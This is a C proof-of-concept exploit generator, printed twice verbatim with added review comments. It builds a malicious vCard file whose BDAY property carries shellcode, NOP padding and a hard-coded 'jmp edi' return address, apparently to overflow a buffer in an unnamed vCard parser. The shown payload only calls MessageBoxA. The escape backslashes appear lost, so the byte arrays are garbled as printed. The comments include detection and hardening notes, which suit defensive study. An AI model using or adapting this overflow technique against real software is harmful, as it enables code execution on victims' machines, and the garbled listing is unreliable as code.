Code:
#include <stdio.h>
/*
 * Proof-of-concept generator: writes a file named vCard.vcf whose BDAY
 * property carries a binary payload instead of a date.
 *
 * File layout, as fixed by the fprintf() format string below:
 *   body_text  - vCard header lines, ending with the bare "BDAY:" tag
 *   shell_code - payload placed directly after "BDAY:"
 *   nops       - padding between payload and the address (author: 14 NOPs)
 *   eip        - 4-byte value the author labels "jmp edi"
 *   end_text   - remaining vCard lines up to END:VCARD
 *
 * The application that parses the file is not named or shown in this
 * listing; presumably it copies the BDAY value into a fixed-size buffer
 * without a length check -- TODO confirm against the original advisory.
 *
 * NOTE(review): both the "jmp edi" value and the MessageBoxA address are
 * hard-coded absolute addresses, so the payload presumably depends on one
 * specific build of the target DLLs.
 * NOTE(review): on this page the string literals show "x33", "n" etc. with
 * no backslash; it looks as if the escape characters were lost when the page
 * was extracted, so as printed the arrays hold plain text rather than raw
 * bytes.
 * NOTE(review): for defenders, a BDAY value that is much longer than a date
 * or is followed by non-printable bytes is the visible anomaly in the
 * generated file; a parser should bound and validate property values before
 * copying them.
 *
 * Portability: main() has no declared return type (implicit int), and only
 * <stdio.h> is included in the visible listing although exit(), clrscr() and
 * getch() are called (normally <stdlib.h> and the DOS/Borland <conio.h>).
 *
 * Returns 0 on success; calls exit(1) if the output file cannot be created.
 */
main()
{
FILE *f;
/* Value written after the NOP padding; the author's label for it follows. */
char eip[]="xc5x95x79x76"; /* jmp edi */
/* Payload bytes; the author's disassembly is in the comment that follows. */
char shell_code[]=
"x33xF6x68x2Ex41xF5xBFx56xC7x02x76x43x61x72xC7x42x04x64x20x65"
"x78xC7x42x08x70x6Cx6Fx69xC7x42x0Cx74x20x62x79xC7x42x10x20x6B"
"x61x6Ax89x72x14x66xC7x42x14x6Cx61x52x52x56xFFx54x24x10";
/* This shell_code that I wrote does the following:
it calls MessageBoxA(0,"vCard exploit by kajla","vCard exploit by kajla",0)
(the mov stores below write that text, little-endian and four bytes at a
time, to the memory edx points at; esi is zero and supplies the terminator)
xor esi,esi
push 0xBFF5412e ;address of MessageBoxA() in user32.dll
push esi
mov dword ptr[edx],72614376h
mov dword ptr[edx+04h],78652064h
mov dword ptr[edx+08h],696f6c70h
mov dword ptr[edx+0Ch],79622074h
mov dword ptr[edx+010h],6a616b20h
mov dword ptr[edx+014h],esi
mov word ptr[edx+014h],616ch
push edx
push edx
push esi
call dword ptr[esp+010h] */
char nops[]="x90x90x90x90x90x90x90x90x90x90x90x90x90x90"; /* 14 NOPS */
/* vCard header; it stops right after "BDAY:" so the payload becomes that property's value. */
char body_text[]=
"BEGIN:VCARDn"
"VERSION:2.1n"
"N:;kajlan"
"FN:kajlan"
"BDAY:";
/* Remaining vCard properties that close the card after the payload. */
char end_text[]=
"EMAIL;PREF;INTERNET:[email protected]"
"REV:20010728T152652Zn"
"END:VCARDn";
clrscr();
/* Create (or truncate) the output file in the current directory. */
if ((f=fopen("vCard.vcf","w"))==NULL)
{
fprintf(stderr,"Cannot create file vCard.vcfn");
exit(1);
}
/* The arrays are emitted with %s, so each one ends at its first zero byte. */
fprintf(f,"%s%s%s%sn%s",body_text,shell_code,nops,eip,end_text);
fclose(f);
printf("File: vCard.vcf created!");
/* Wait for a key press before the program exits. */
getch();
return 0;
}
#include <stdio.h>
/*
 * Second copy of the generator on this page; the listing is a verbatim
 * repeat of the one that precedes it.
 *
 * Purpose: create vCard.vcf, a vCard 2.1 file in which the BDAY property is
 * followed by shell_code, nops and eip instead of a date, then by the
 * closing vCard lines in end_text.
 *
 * The parser this file is aimed at is not identified in the listing;
 * presumably the BDAY value overruns a fixed-size buffer there -- TODO
 * confirm against the original advisory.
 *
 * NOTE(review): the addresses in eip and in the payload are hard-coded, so
 * the result is presumably tied to one specific build of the target DLLs.
 * NOTE(review): the literals appear on this page without backslashes
 * ("x90", "n"); the escapes look lost in extraction, in which case the
 * arrays contain printable text, not raw bytes.
 * NOTE(review): detection and hardening both hinge on the BDAY value: it is
 * far longer than a date and is meant to contain non-printable bytes, so
 * length and character validation of property values rejects it.
 *
 * Portability: implicit-int main(); exit(), clrscr() and getch() are used
 * with only <stdio.h> included in the visible listing.
 *
 * Returns 0 on success; exit(1) when fopen() fails.
 */
main()
{
FILE *f;
/* Written last in the BDAY value, after the NOP padding. */
char eip[]="xc5x95x79x76"; /* jmp edi */
/* Payload; see the author's disassembly in the next comment. */
char shell_code[]=
"x33xF6x68x2Ex41xF5xBFx56xC7x02x76x43x61x72xC7x42x04x64x20x65"
"x78xC7x42x08x70x6Cx6Fx69xC7x42x0Cx74x20x62x79xC7x42x10x20x6B"
"x61x6Ax89x72x14x66xC7x42x14x6Cx61x52x52x56xFFx54x24x10";
/* This shell_code that I wrote does the following:
it calls MessageBoxA(0,"vCard exploit by kajla","vCard exploit by kajla",0)
(esi is cleared first and is used for both zero arguments and for the
string terminator; edx is used as the address of the text buffer)
xor esi,esi
push 0xBFF5412e ;address of MessageBoxA() in user32.dll
push esi
mov dword ptr[edx],72614376h
mov dword ptr[edx+04h],78652064h
mov dword ptr[edx+08h],696f6c70h
mov dword ptr[edx+0Ch],79622074h
mov dword ptr[edx+010h],6a616b20h
mov dword ptr[edx+014h],esi
mov word ptr[edx+014h],616ch
push edx
push edx
push esi
call dword ptr[esp+010h] */
char nops[]="x90x90x90x90x90x90x90x90x90x90x90x90x90x90"; /* 14 NOPS */
/* Opening vCard lines; deliberately ends on the "BDAY:" tag with no value. */
char body_text[]=
"BEGIN:VCARDn"
"VERSION:2.1n"
"N:;kajlan"
"FN:kajlan"
"BDAY:";
/* Trailing vCard lines written after the payload. */
char end_text[]=
"EMAIL;PREF;INTERNET:[email protected]"
"REV:20010728T152652Zn"
"END:VCARDn";
clrscr();
/* Output goes to a fixed file name in the working directory. */
if ((f=fopen("vCard.vcf","w"))==NULL)
{
fprintf(stderr,"Cannot create file vCard.vcfn");
exit(1);
}
/* Order of the arguments defines the file layout: header, payload, padding, address, trailer. */
fprintf(f,"%s%s%s%sn%s",body_text,shell_code,nops,eip,end_text);
fclose(f);
printf("File: vCard.vcf created!");
/* Blocks until a key is pressed. */
getch();
return 0;
}